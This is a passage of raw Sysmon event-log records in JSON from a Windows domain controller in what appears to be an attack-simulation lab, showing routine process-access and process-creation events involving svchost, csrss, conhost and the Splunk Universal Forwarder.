C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5915,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5916,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03AB-5F25-0000-0010BBF80A00}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03AB-5F25-0000-0010BBF80A00}","TargetProcessId":"5076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5917,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nProcessGuid: {A837DB8D-03AD-5F25-0000-0010A7FA0A00}\r\nProcessId: 4852\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","ProcessGuid":"{A837DB8D-03AD-5F25-0000-0010A7FA0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5918,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03AD-5F25-0000-0010A7FA0A00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03AD-5F25-0000-0010A7FA0A00}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5919,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03AD-5F25-0000-0010A7FA0A00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03AD-5F25-0000-0010A7FA0A00}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5920,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5921,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5922,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
